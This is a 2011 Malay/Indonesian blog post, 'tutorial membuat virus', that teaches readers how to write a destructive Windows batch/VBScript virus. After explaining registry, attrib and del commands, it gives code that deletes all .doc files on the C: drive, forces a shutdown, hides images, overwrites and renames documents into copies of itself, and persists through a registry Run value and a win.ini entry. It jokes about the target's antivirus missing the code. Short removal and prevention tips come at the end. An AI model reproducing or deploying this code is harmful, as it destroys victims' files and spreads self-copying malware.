Saturday, 10 September 2011

tutorial membuat virus

1.Delete Registry: REG DELETE ALAMAT / v VALUE NAME / f

Keterangan:

- REG DELETE = Menghapus registry

- ALAMAT = Hkey \ Software \ dst

- / V VALUE NAME = Nama Value

- / F = Tidak wajib!! Berfungsi untuk melaksanakan perintah tanpa prompt

Contoh: REG DELETE Hkey \ Software \ Microsoft \ Windows \ Policies \ Explorer / v NoLogOff

Fungsi = Memadam Value NoLogOff Di Alamat Registry Hkey \ Software \ Microsoft \ Windows \ Policies \ Explorer



2.ADD Registry: REG ADD ALAMAT / v VALUE NAME / t TYPE / s SEPARATOR / d DATA / f

Keteranagn:

- REG ADD = Menambah registry

- ALAMAT = Hkey \ Software \ dst

- / V VALUE NAME = Nama Value

- / T TYPE = Type data Ex: REG_DWORD, REG_SZ

- / D DATA = Isi Value

- / F = Tidak wajib!! Berfungsi untuk melaksanakan perintah tanpa prompt



3.PROMPT: PROMPT Text

Keterangan:

PROMPT = Perintah untuk merubah text PROMPT

Text = Text yang ingn kita munculkan di PROMPT

Text boleh menggunakan aksara istimewa yang daftarnya berikut ini!!

$ A = Watak & $ N = Drive kita menginstal windows

$ B = Watak | $ L = Default

$ C = Watak ($ Q = Watak =

$ D = Watak Tarikh Sekarang $ S = Watak Ruang

$ E = Watak Escape Kod $ T = Watak Jam Sekarang

$ F = Watak) $ V = Watak No Versi Windows

$ G = Watak> (lebih besar dari) $ _ = Watak Garis Bawah

$ H = Watak No Text $ $ = Watak Dollar

$ L = Watak <(lebih kecil dari) $ + = Watak Aritmatik



4.Replace: Replace [Drive \ Path \ namafile] [Drive \ Path] / A / P / R / S / L / U

Keterangan:

Replace = Pindah

- [Drive \ Path \ namafile] = Tertentu sumber fail

- [Drive \ Path \] = Folder Objektif

- A = Pindah File ke Folder Objektif (No Update)

- L = Membuat Prompt mengesahkan Kita Sebelum Memindahkan

- R = Pindah hanya File Attribut Read Only

- S = Pindah File Ke Semua Sub Direktori Folder Objektif

- W = Tunggu kita memasukan disk / flashdisk sebelum memindahkan

- U = Pindah dan Update jika nama fail sudah ada

- Jika anda menggunakan parameter / A tidak boleh menggunakan / S / U begitu juga sebaliknya.



5.Attrib: Attrib + R-R + A-A + H-H + S-S ADRESS / S / D

Keterangan:

Attrib = Rubah Attribut File / Folder

- (-) = Untuk Menghapus Attribut

- (+) = Untuk Menambah Attribut

- (A) = Attribut Archieve

- (R) = Attribut Read Only

- (H) = Attribut Hidden

- (S) = Attribut Super_Hidden / System

- / S = Proses terhadap fail yang sama dalam folder dan subfolder

- / D = Proses folder Sebagai Sumber

- Adress = Alamat File Misal: C: \ Lucky \ Ganteng



6.Del: Del / L / F / S / Q / Attribut / Adress

Keterangan:

- Del = Padam File / Folder

- / L = Membuat Prompt mengesahkan Kita Sebelum Padam

- / F = Padam Hanya Read Only File

- / S = Padam File Yang Sama Di Semua Sub Directory

- / Q = Padam Dengan Cepat

- / Attribut = Pilih Attribut File Yang Ingin Di Padam (Tidak Ada Berarti Semua File) tanda (-) bererti yang tidak di padam-- Adress = Alamat File Misal: C: \ Lucky \ Ganteng



7.Rename: Rename / Ren [Drive \ Path \ namafile] NewFileName

Keterangan:

- Rename = Rubah Nama Fail

- [Drive \ Path \ namafile] = Alamat Drive dan Nama Fail

- NewFileName = Nama Fail Baru



8.Type: Type [Drive \ Path \ namafile]

Keterangan:

- Type = Membuka Semua File Text (*. txt, *. doc, *. xls, *. ini, *. vbs, *. js, dll)

- [Drive \ Path \ namafile] = Lokasi File



9.Start: Start ADDRESS_FILE

- Start = Untuk menjalankan File

- ADDRESS_FILE = Alamat file di special folder seperti windows dan system32

- Ex: Start Regedit maka akan menjalankan Registry Editor.

sekarang kita akan membahas file *. bat yang berfungsi untuk menjalankan perintah command prompt secara bersamaan. oke ketikan kod berikut di notepad: date 07-07-07 dan save dengan nama edit_time.bat dan pilih "All File" dalam medan "Save As Type" lalu jalankan!! setelah itu apa yang terjadi?? yah tarikh berubah jadi juli-7-2007.



fail *. bat kita tidak mungkin membuat banyak fail *. bat kerana selain akan cepat dikesan, kita juga akan semakin rumit merubahregistry!! namun jangan kuatir kerana fail *. bat boleh menjalankan perintah DOS / COMMAND_PROMPT secara langsung.

berikut perintah ini, kita buka notepad dan ketikan code berikut:

del C: \ *. doc '- hapus semua file berextensi doc di drive c

Shutdown-s-f-t 30-c "Selamat Tidur" '--s = shutdown computer,-f = tutup semua aplikasi tanpa amaran,-t = setting masa (dalam saat)-c = memaparkan mesej "Selamat Tidur" (Bebas kita ubah)

attrib + s + h C: \ *. jpg / s / d '- beri attribut hidden dan system semua fail jpg

for / R c: \%% r in (*. cob *. doc) do copy% 0 "%% r" '- Copy isi file *. bat ke semua fail *. cob dan *. doc di C

for / R c: \%% r in (*. cob *. doc) do ren "%% r" *. bat '- Rename semua fail *. cob dan *. doc jadi *. bat, sehingga isi file jd virus kita: D haha .. haha

Untuk isi file bat yang akan menumpang di virus vbs kita anda boleh pilih mana yang paling sesuai!! mungkin memadam, shutdown dalam 30 saat, menyembunyikan atau mengubah sebarang isi kandungannya jadi file *. bat?? dipilih!! dipilih!!

atau boleh masukin semuanya sehingga virus kita ditambah kod berikut ini:

Set bath = fso.CreateObject (towind & "\ sialan.bat")

bath.writeline "del C: \ *. doc"

bath.writeline "Shutdown-s-f-t 30"

bath.writeline "for / R c: \%% r in (*. cob *. doc) do copy% 0%% r"

bath.writeline "for / R c: \%% r in (*. cob *. doc) do ren%% r *. bat"

bath.close

'Bonus

wsh.regwrite "HKEY_LOCAL_MACHINE \ Software \ Microsoft \ Windows \ Cur rentVersion \ Main \" SysError "," towind & "\ sialan.bat", "REG_SZ"

Maka ketika windows diaktifkan semua fail doc akan menjadi *. bat dengan isi kod penghancur kita: D boleh diselamatkan ga tuh?? coba saja supaya anda tahu!!

Namun jika anda punya anti virus biasanya kod tersebut akan di blok kerana jelas-jelas untuk merosakkan!! lalu bagaimana?? kita berdoa supaya antivirus komputer sasaran tidak mengenali: D karena memang tidak semua antivirus akan memblok perintah tersebut. Oia sebagai tambahan kita boleh membuat fail lain seperti *. html atau *. ini!! jika kita punya banyak salinan virus kita bisa membuat file *. ini supaya orang tidak cepat mengetahui virus kita hanya dengan membuka Regedit. untuk terakhir kali saya akan berikan lagi suatu code yang akan merubah gambar ini diwindows sehingga menjalankan virus kita. oke langsung saja tentunya dengan perintah

set BuatIni = fso.CreateTextFile ("C: \ WINDOWS \ Win.ini")

BuatIni.writeline "[WINDOWS]"

BuatIni.writeline "run = C: \ Ju_Pe.vbs" '- rubah sesuai letak dan nama virus

BuatIni.writeline "load = C: \ Persik.vbs" '- rubah sesuai letak dan nama virus

BuatIni.close

Maka ketika windows dijalankan virus akan aktif!! walaupun mungkin registry telah diubah.

Dari pembahasan kita maka kita boleh simpulkan beberapa langkah berikut jika terkena virus vbs: jika tidak di enkripsi anda boleh melihat dan membunuh semua virus dan membenarkanregistry dengan membaca source kodenya, tapi jika di enkripsi kita lakukan langkah berikut:

1.Matikan proses virus!! anda boleh menggunakan tool pengganti taskmanager yang biasanya akan di blok.

2.Hapus semua salinan virus!! anda boleh gunakan antivirus update terbaru dan jika dihalang virus anda rubah dulu namanya seperti PCMAV_CLN.exe jadi 123.exe

3.Buka registry dan semak dengan teliti semua subkey run automatik biasanya akan terdapat key yang mengarah ke letak virus yang dijalankan dan periksa fail win.ini!! jika dirubah anda minta dari komputer teman anda: D dan jika ada penggunaan letak virus langsung hapus.

4.Rubah semua registry yang dirubah virus!! bisa dengan TuneUp Utilities dan sebagainya!!

Untuk pencegahan lakukan langkah berikut:

1.Gunakan antivirus terbaru, jika boleh yang mempunyai ciri-ciri heuristik seperti ANSAV.

2.Jangan asal klik file!! lihat dikolom type Windows Explorer apabila application tapi iconnya folder atau MS Word langsung hapus.

3.Selalu scan jika mencolokan flaskdisk

4.Matikan proses autorun melalui registry di alamat

"HKCU (atau HKLM) \ Software \ Microsoft \ Windows \ CurrentVersion \ Po licies \ Explorer", buat DWORD value baru dengan nama NoDriveTypeAutoRun dan isi dengan nilai 255. atau melalui start-Main-taip gpedit.msc-User Configuration-pentadbiran Templates - System - Cari Turn Off AutoPlay - klik 2x dan rubah jadi Enabled!!

No comments:

Post a Comment

Updates Via E-Mail

Labels

007 Legends (1) 007 Legends repack (1) 007 Legends-Black Box (1) 007 Legends-Black Box repack (1) 2K Games (1) 2K Marin (1) Action (8) Action RPG (5) Activision Blizzard (3) Alan Wake American Nightmare (1) Alan Wake American Nightmare-Black Box (1) ANARCHY (5) Antara AES dan pemandu kereta perasan bijak (1) antivirus (6) ARTIKEL (90) Bethesda Softworks (2) Binary Domain (2) BioShock 2 (1) BioWare Corporation (1) bitComposer Games (1) Bugbear Entertainment (1) Call of Duty: Modern Warfare 3 (1) Call of Duty: Modern Warfare 3-Black Box (1) CARDING (3) CD Projekt Red Studio (1) CERITA (7) CRACKER (18) Crysis 2 (1) Crytek Studios (1) Dark Souls: Prepare to Die Edition (1) Dark Souls: Prepare to Die Edition-Black Box (1) Darksiders (1) Darksiders II (1) Deface (1) Devil's Details (2) Digital Extremes (1) Doom 3:BFG Edition (1) Doom 3:BFG Edition-Black Box (1) EA Sports (1) Electronic Arts Inc. (4) ENGLISH MOVIE (29) Eurocom Entertainment Software (1) event (1) Exploit (76) FABLE III (1) Facebook Game Hack (1) FIFA 13 (1) FIFA 13-Black Box (1) Flashing (1) Flying Wild Hog (1) From Dust (1) From Dust-Black Box (1) From Software (1) gba games (1) Global Ops: Commando Libya (1) Global Ops: Commando Libya-Black Box (1) GORE (1) Hard Reset (1) Hard Reset-Black Box (1) HIJACK (2) History (3) id Software (1) iklan. (4) Infinity Ward (1) INFO (35) iPhone Jailbreak (9) ISU SEMASA (33) JOB (1) JOOMLA (1) KILLUMINATI (7) Konami (1) Lain-Lain Trick (1) LionHead Studios (1) MAKE MONEY (1) MALAY MOVIE (15) Mass Effect 2 (1) Max Payne 3 (1) Max Payne 3-Black Box (1) Maxis (1) Microsoft Game Studios (1) misteri (4) MOBILE (1) MUJAHID (27) music album mp3 (20) n-gage (1) Namco Bandai Games (3) NDS (1) Notepad Trick (1) OS (5) OTHER MOVIE LANGUES (8) PC GAME (141) photo (5) political (2) Pro Evolution Soccer 2013 (1) Pro Evolution Soccer 2013-Black Box (1) Prototype 2 (1) Prototype 2-Black Box (1) PS VITA (4) PS3 GAME (32) PSN GAME (6) PSP (7) PSPGAMES (4) puisi (1) putlocker games (5) Racing (1) Radical Entertainment (1) religion (12) Remedy Entertainment (1) repack game (1) REVEAL (32) Ridge Racer Unbounded-Black Box (1) Rockstar Games (1) S60v2 (1) Samsung U1000 (1) SEGA (2) SEO (2) Shooter (2) Shooting (2) Soalan bocor SPM 2012 ada di sini (1) Soft Skills Guide (1) software (31) Spectral Games (1) Sport (2) Strategy (1) SYSTEME (3) The Darkness II (1) The Darkness II-Black Box (1) The Elder Scrolls V: Skyrim (1) The Elder Scrolls V: Skyrim-Black Box (1) The Sims 3 (1) The Sims 3 Complete (1) The Sims 3 Complete-Black Box (1) The Witcher 2: Assassins of Kings (1) THQ Inc (2) tips (1) TOKOH (1) tool (2) Tutorial (30) TWEAK (6) Ubisoft Studios (1) UNDERGROUND (4) video movie (1) video music (1) Vigil Games (2) Website Hack (1) wii (2) XBOX360 (7) xboxone (1)

Total Pageviews

Blog Archive

LIST